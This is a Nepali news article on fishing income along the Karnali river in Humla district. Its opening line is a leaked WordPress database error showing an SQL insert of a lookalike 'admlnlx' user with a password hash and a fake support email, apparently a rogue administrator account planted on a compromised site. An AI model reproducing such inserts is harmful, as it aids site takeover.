WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPTz0LRangr87W9XmKlMm5quAKJ5T1/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 15:26:24', '', 'admlnlx', 'admlnlx')
कर्ण बहादुर रोकाया, हुम्ला ।। हुम्ला जिल्लामा कर्नाली नदी छेउछाउमा वर्षमा नौ महिना माछा मार्ने कामबाट वार्षिक ६ करोेड आम्दानी हुने गरेको छ । हुम्लाको सदरमुकाम नजीकैको छिप्रा गाविसको नल्न गाउँदेखि बाजुरा जिल्लाको सिमाना कवाडीसम्मको करीब पाँच दर्जन स्थानहरुमा परम्परागत रुपमा माछा मार्ने व्यवसायबाट मात्रै हुम्लीहरुले वार्र्षिक ६ करोडभन्दा धेरै आम्दानी गर्ने गरेको आँकडा प्राप्त भएको छ ।
हुम्लाको नल्न, खार्पु, याँचु, लाली बगर, सुनखाडा, छारे, रिपगाड, खँगाड, नागड, दुल्लीकुना, सर्केगाड, न्याँसी, सलीसल्ला, खच्चा, तुम्च, नेरगाड, मकै, बालुकुना, गल्ःफागाड, तीर्थसैन, दोमुखा, पुइमा, कवडी लगायतका करीब पाँच दर्जन स्थानहरुबाट पासो, बल्छी, सोला, आँध तथा अन्य तरिकाबाट सिल्भरकार्प, रातो र सर्प जस्तो तीन प्रकारका माछाहरु मारेर दैनिक पाँच सयदेखि तीन हजारसम्म आम्दानी गर्ने गरेको सकिैदउ गाविस रीप गाउँका गम्भीरे दमाईको अनुभव रहेको छ ।
जिल्लामा वार्षिक रुपमा यति धेरै आम्दानी माछा मार्ने पेशाबाट भए पनि यसको दिगो विकास, माछापालन, के कस्तो किसिमका माछाहरु हुन्छन् । यसको बारेमा जिल्ला कृषि विकास कार्यालय लगायत अन्य निकायबाट कुनै बहस छलफल र सम्भाव्य अध्ययन समेत भएको छैन तर यसलाई व्यवस्थित रुपमा विकास विस्तार गर्ने सकेमा उच्च हिमाली क्षेत्रमा पाइने जैविक माछा पनि हुम्ला जिल्लाको लागि आम्दानीको स्रोत बन्ने जैर गाविस जैर गाउँका गोकुल बुढाले बताए ।
हुम्लाको माथिल्लो भेगमा वर्षको ८ महिना र तल्लो भेगमा वर्षभरी नै माछा मार्ने गरिए पनि माघदेखि कात्तिकसम्मको समयलाई उपयुक्त मानिन्छ । हाल हुम्लामा करीब ३ हजार मानिसहरु दैनिक माछा मार्ने काममा संलग्न भएको एक अध्ययनले देखाएको छ । माछाको गाउँघरतिर प्रति केजी २ देखि ३ सयसम्म र सदरमुकाम सिमकोट वरपर क्षेत्रमा ४ सयदेखि ६ सयसम्म प्रति केजी पर्ने गरेको छ ।
हुम्ला जिल्लालई कर्नाली नदीले बीच भाग भएर बगेकाले यसको वरपर दर्जनौं नदीनालाहरु र गाडहरु भएकोले माछा पालन गर्न गराउन सकिएको खण्डमा एकातिर जलखेतीको नयाँ प्रयोग र अर्कोतिर व्यवसायको रुपमा सूचिकृत नभएको माछापालन व्यवसायले जिल्लाको अर्थतन्त्रमा नयाँ आयाम थप्ने राम्रो सम्भावना रहेको पाइन्छ ।